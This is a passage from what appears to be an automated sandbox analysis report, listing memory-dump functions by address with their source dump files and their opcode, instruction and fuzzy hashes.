                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c66bc6f73ec0874b81f3541fb8e3e39d49bad50fd6dde4f477df11fbd292174f
                                                                                        • Instruction ID: dfd46a9f6eb1f9ed8eb28441a8c7f9a2fcc72ef61360099b360b12e92fc15704
                                                                                        • Opcode Fuzzy Hash: c66bc6f73ec0874b81f3541fb8e3e39d49bad50fd6dde4f477df11fbd292174f
                                                                                        • Instruction Fuzzy Hash: 3511E731B19A0E9FEB68EB7594A58FE7390EF54355B01063AD04EC75E2CE28B54582D0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC72370 Relevance: .1, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: daa36d1a1119b2ec4bb9659ffe9d9fb7944d7ec3fc6333171648536e74b4bb9a
                                                                                        • Instruction ID: 6f0000c1a4567118f027cc012cbd060bcd2eac5550066924367d7572b3c14612
                                                                                        • Opcode Fuzzy Hash: daa36d1a1119b2ec4bb9659ffe9d9fb7944d7ec3fc6333171648536e74b4bb9a
                                                                                        • Instruction Fuzzy Hash: 8B110431B1AA0B8FEB68FB7484618FD7391EF55350B00063AD04EC75E2CE28B6458290
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC8B1F0 Relevance: .1, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a824628b6809187fc67d23b46fa40a8078ba0b2461365370e80dcfc4f34a46d5
                                                                                        • Instruction ID: 13a03b4064252597158f5514ce0b425418076e86d580b92c96d5c6bca3ff9c41
                                                                                        • Opcode Fuzzy Hash: a824628b6809187fc67d23b46fa40a8078ba0b2461365370e80dcfc4f34a46d5
                                                                                        • Instruction Fuzzy Hash: 55110431B1AE0A8FDB68EB7484618FD7391EF64355B01063BD04EC75E2DE39B6458290
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC772B9 Relevance: .1, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3a940ca2cdfeda7cd4849e1f79e135c95edeb911f468f3c3be7727b118adb701
                                                                                        • Instruction ID: f4eaef953eda7928e0cfb13d8ddcf4582422ee2e26901b46d3e1d809c8a035dc
                                                                                        • Opcode Fuzzy Hash: 3a940ca2cdfeda7cd4849e1f79e135c95edeb911f468f3c3be7727b118adb701
                                                                                        • Instruction Fuzzy Hash: C6016B32B0AB5D5FE3B1D6A44C986FE3BE4EB56251F020177E008D31A1DD541D0283A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BABFC9D Relevance: .1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baba000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0871de9b59b33140e54c2fcd2d2d92ce7f4eff023844af9c71fe72a8b9bf58a7
                                                                                        • Instruction ID: 20eb74c350191c97fd6a9490a0cc617452e95b26f1382e1cd9bb95c0f8349408
                                                                                        • Opcode Fuzzy Hash: 0871de9b59b33140e54c2fcd2d2d92ce7f4eff023844af9c71fe72a8b9bf58a7
                                                                                        • Instruction Fuzzy Hash: 3F21AC31E0D65E8FE7249B94C8646FDBBA0EF06304F14023AD426972D6CAB966448B40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAAFDBA Relevance: .1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baad000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2d7bee1a48dfe7b56df330db95ed813615d574c80c711a47deba96a6eb97db7b
                                                                                        • Instruction ID: 076d60db3735689601679f090f0222811c1c68c4f73f298ce5bdba0a35337702
                                                                                        • Opcode Fuzzy Hash: 2d7bee1a48dfe7b56df330db95ed813615d574c80c711a47deba96a6eb97db7b
                                                                                        • Instruction Fuzzy Hash: 2A11B730A0952D8FCFA9DB48C894AA8B3B6FF59301F1041E9D00EE7661CB71AE81CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC93BDE Relevance: .1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d950994f1860d905fc236e511cc43792a48d4d8dc5e15b857e00f5d2357834b2
                                                                                        • Instruction ID: a733d3b368ef3e49c5b1fb05f684b997fd2979c5e27f55c28c5db92cf4edad46
                                                                                        • Opcode Fuzzy Hash: d950994f1860d905fc236e511cc43792a48d4d8dc5e15b857e00f5d2357834b2
                                                                                        • Instruction Fuzzy Hash: 7B11483270AA0B8FF729AB68D4656F93390EFA5351F01013BD409C76E1CB25A64087D0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC9987E Relevance: .1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6bcb0e94665ea46d2f5c83260bd2170afd1e9e965c8d35cbb59233b20537b4b4
                                                                                        • Instruction ID: f0b073fb1145554a81c00270a2519d25904a0b577386ca382307b039215dcbf4
                                                                                        • Opcode Fuzzy Hash: 6bcb0e94665ea46d2f5c83260bd2170afd1e9e965c8d35cbb59233b20537b4b4
                                                                                        • Instruction Fuzzy Hash: DA11483170A60B8FF729AA68D4692E93390EFA5351F02013BD41DC72E5CF66AA40C7D0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC77E2E Relevance: .1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 47ccc82130b8ac672e6e37ab6af0d4dbd72d25afae6c24d21d38f1ad49e99969
                                                                                        • Instruction ID: 7d7b04f4458db2157492b60ea00aa0610ee3a941270dc0656dc40e23b242bba5
                                                                                        • Opcode Fuzzy Hash: 47ccc82130b8ac672e6e37ab6af0d4dbd72d25afae6c24d21d38f1ad49e99969
                                                                                        • Instruction Fuzzy Hash: 7811483170660F8FE729AA68D8A56FD3390EF64361F01013BD509C72E1CF25AA4087D0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC721EE Relevance: .1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 361be9a3f937a18472766c17219ada863463977d159dcf1c0b0ff8b8b46abefb
                                                                                        • Instruction ID: 7b9f7af9991f74b490191ff8b06a1493a60c79cc3e9915601c04ede16964bd6e
                                                                                        • Opcode Fuzzy Hash: 361be9a3f937a18472766c17219ada863463977d159dcf1c0b0ff8b8b46abefb
                                                                                        • Instruction Fuzzy Hash: D611483170660BCFE729AAA8D4A56FD7394FF66361F11013BD809CB2E2CB25A640C7D0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baa0000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d1fb6219307e21cd508ddcfe0af906d109d0b950c9ed0d10fa3ce1be6c9fd3f1
                                                                                        • Instruction ID: 0e7efcb2eabbddc708548b785dc312c442dddfb67a1cc011a4cd1b3944734df2
                                                                                        • Opcode Fuzzy Hash: d1fb6219307e21cd508ddcfe0af906d109d0b950c9ed0d10fa3ce1be6c9fd3f1
                                                                                        • Instruction Fuzzy Hash: BB118035B0D54E4BE731EFA8D8202ED7761EF81311F014533D4599B1E2DA74230A87A4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC8B06E Relevance: .1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a22b80f91439cccf3814967825fe665c49f41156bc8998431ac1baa47cd45c0d
                                                                                        • Instruction ID: 629b9eef40e600236bfb0ac3cd4ccf31ff25a3492148213682f72f62554b1384
                                                                                        • Opcode Fuzzy Hash: a22b80f91439cccf3814967825fe665c49f41156bc8998431ac1baa47cd45c0d
                                                                                        • Instruction Fuzzy Hash: E7114831706A0B8FE729AA68D4A52ED3390EF65351F11013BD909C72F1DF36AA40C7D0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAAFE34 Relevance: .1, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baad000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 795eba1d6cccd0efd4ccb72a6d436d4815caf3e169d1de3fd1718d3326b05150
                                                                                        • Instruction ID: f8838a5677fc3aa8d8f8aff333a9bfa824ad3c95ac0ec28b1cde12671a4d7b29
                                                                                        • Opcode Fuzzy Hash: 795eba1d6cccd0efd4ccb72a6d436d4815caf3e169d1de3fd1718d3326b05150
                                                                                        • Instruction Fuzzy Hash: A121B830A0961D8FCBA9DF48C895AA8B3B6FF55301F5041E9D10EE7661CB71AE80CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9C2905E1 Relevance: .1, Instructions: 58COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2937457782.00007FFD9C290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C290000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9c290000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f3c778bf5da6e5a82c73336cf93f1d05c9f20d4c9c0a105bc1b72db927373eb8
                                                                                        • Instruction ID: 5ac1dcfa8c6242c8783ef7fbde757610f39b21c12b8c75d4a9b365de94f72619
                                                                                        • Opcode Fuzzy Hash: f3c778bf5da6e5a82c73336cf93f1d05c9f20d4c9c0a105bc1b72db927373eb8
                                                                                        • Instruction Fuzzy Hash: 6721E770E0C21E8FEBA8DF44C5647AEB6B6EF98351F5081B9C40E92391CB396985CF45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BABEEEF Relevance: .1, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baba000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5952d0ce99353f4ba2e3f00e00de0fc328ca86daa903fd2f1978f7f580aaeca4
                                                                                        • Instruction ID: 43aa59d982024dd3a6672bb1b180c8ddadf7a0768066803874a9ec81d6f4a5a6
                                                                                        • Opcode Fuzzy Hash: 5952d0ce99353f4ba2e3f00e00de0fc328ca86daa903fd2f1978f7f580aaeca4
                                                                                        • Instruction Fuzzy Hash: 4A115AA584E7C95FD7138B709861794BFB0AF13204F0A41DBE8848B1A3D6688A19C362
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baa0000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4d778dc7b90252a121b3fd9f20209b85b7a01f3de42202ddd119e13c177e218d
                                                                                        • Instruction ID: 09408460bcd37d867415d3d0c5193804eb6edfdb390465472bd9b8741d476d41
                                                                                        • Opcode Fuzzy Hash: 4d778dc7b90252a121b3fd9f20209b85b7a01f3de42202ddd119e13c177e218d
                                                                                        • Instruction Fuzzy Hash: 19112B35B0D54E8BE722EFA4D8602EEB762EF41311F014577D4599B2E2CA742219CB64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC74A80 Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 90b49ad1366458f2f4c40263c750d03d4b0f32e048c13e35cc3ab6cc191362b9
                                                                                        • Instruction ID: 0bf5000935814e4d059a162afaac0992a7c98ff63c7feac47fff5e8327884e18
                                                                                        • Opcode Fuzzy Hash: 90b49ad1366458f2f4c40263c750d03d4b0f32e048c13e35cc3ab6cc191362b9
                                                                                        • Instruction Fuzzy Hash: 07017522F0F65F82F67992F928B15BD4441EF84760F26027AF44EC71E68C0D3A80229A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAB77AD Relevance: .1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bab5000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ddd47ad13a19703c5f095b0ac6a43e9333ecc81853632f9a0dcd87d6a7b2cc2c
                                                                                        • Instruction ID: f5721d0e34a412f789dfc2ba6b2b5f704c198e27951d9c1c1b8c02a2c0c36b94
                                                                                        • Opcode Fuzzy Hash: ddd47ad13a19703c5f095b0ac6a43e9333ecc81853632f9a0dcd87d6a7b2cc2c
                                                                                        • Instruction Fuzzy Hash: 6A016D31E0E68D4FE7119B94D8212FCBBF1EF46310F024176D118D21D2DEB81945CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAC20EC Relevance: .1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baba000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 26de3460f47b332ffdc1b0c62d5c3fb4e0cd5200fae50b49a6fc4c8b848b90d5
                                                                                        • Instruction ID: 8fc607a82bb37ac78b985cfb0b1767a712d3663a5f37b06221f42010d152e684
                                                                                        • Opcode Fuzzy Hash: 26de3460f47b332ffdc1b0c62d5c3fb4e0cd5200fae50b49a6fc4c8b848b90d5
                                                                                        • Instruction Fuzzy Hash: B111E570A1964F8FEB60EF40C8506F933E6FF55300F0101BAC41D972E2DAB56A86DB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAB7F51 Relevance: .0, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bab5000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cb0dfdd9f948c5de414ad095f6c3404e48d08e47cb4a934e9d5ca7a45fcf924c
                                                                                        • Instruction ID: 8815322c782a80e3f325324d05c9bf8c991bab5887d961d1eb9943e1f087dac3
                                                                                        • Opcode Fuzzy Hash: cb0dfdd9f948c5de414ad095f6c3404e48d08e47cb4a934e9d5ca7a45fcf924c
                                                                                        • Instruction Fuzzy Hash: 7C014430A1968D8FCB85EF18C891AD93BE0FF28304F0501AAE859C3261C774E954CB82
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC765AB Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 82ff6956ba0e0e31ccc45f4a53784e62b62ecb03bc9ff6b3c06c899e09df879e
                                                                                        • Instruction ID: ac71c93382c5630b06404a1f4058c984641abef6fc4d280c1cf7d3a6032f3a85
                                                                                        • Opcode Fuzzy Hash: 82ff6956ba0e0e31ccc45f4a53784e62b62ecb03bc9ff6b3c06c899e09df879e
                                                                                        • Instruction Fuzzy Hash: B2014F3090894C8FCFA8EF18C8A4BD8B7B1EBA8315F0401A9D00DE7291CA359AC0CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baa0000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7d9e134f0d663116e532d0b827fc430ce87ab4e5b883d6a6203bf16a38162828
                                                                                        • Instruction ID: 62a0febc47fab6da54eff9fce4c7cf6f17cd56e743472f869b9c89eead1bf06a
                                                                                        • Opcode Fuzzy Hash: 7d9e134f0d663116e532d0b827fc430ce87ab4e5b883d6a6203bf16a38162828
                                                                                        • Instruction Fuzzy Hash: 3901F770E0E68E8BE721EFA4C8602EEB762EF45314F004576D469972E2DE786314CB55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC91FE9 Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b4a7b1f144ceae25a188520f94405571b1e568b474c534fc3dc8a242c70e0d48
                                                                                        • Instruction ID: d4ac0f88ed9cd17e4478649433839f49bb5afc9ccd0d6865c9e0ea236c15469b
                                                                                        • Opcode Fuzzy Hash: b4a7b1f144ceae25a188520f94405571b1e568b474c534fc3dc8a242c70e0d48
                                                                                        • Instruction Fuzzy Hash: BF01C07090D95D8FEFA8DF98C864AACB7B1FF69310F1401AED04DE76A6DA756940CB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC765AA Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3977f82886b8baf0ecf9402924497c43b3e9074d88f33d4bec3fb8fe04516c8e
                                                                                        • Instruction ID: 442337412d6a3a7191fb2ef8bb89ea173e46517258930433a838b84edf3db8c2
                                                                                        • Opcode Fuzzy Hash: 3977f82886b8baf0ecf9402924497c43b3e9074d88f33d4bec3fb8fe04516c8e
                                                                                        • Instruction Fuzzy Hash: 0F014F3090894C8FCFA8EF58C8A4BD8B7B1FB68315F0401A9D40DE7291CA359AC0CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAB8445 Relevance: .0, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bab5000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6b9d58207296ba072a202b7136bad692fe61f04081fc3f518d5f8f6e2a505cdc
                                                                                        • Instruction ID: 8d6d1ad1ad6538c8bd03d16a8912bc0916909cb17badbd5e914b924ac495f455
                                                                                        • Opcode Fuzzy Hash: 6b9d58207296ba072a202b7136bad692fe61f04081fc3f518d5f8f6e2a505cdc
                                                                                        • Instruction Fuzzy Hash: 6501AD3091978C8FCB58DF18C8565ED3BF0FF18311F0502AAE85887292D738E654CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9C2A0139 Relevance: .0, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2937457782.00007FFD9C290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C290000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9c290000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e1bba2b4ad27dc0be5e8c084748b5715fa2e61a8e2f75308af87072ee8c28f8d
                                                                                        • Instruction ID: 1add6a15a8bddec5bce40e4b7495acd7a4e7a0319a08d4be59b38a0c2c7966b6
                                                                                        • Opcode Fuzzy Hash: e1bba2b4ad27dc0be5e8c084748b5715fa2e61a8e2f75308af87072ee8c28f8d
                                                                                        • Instruction Fuzzy Hash: 10015670E0860E9BEB24DF99C864AEE77B5FB89344F50812AC41B93391DA34A505CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC7C242 Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
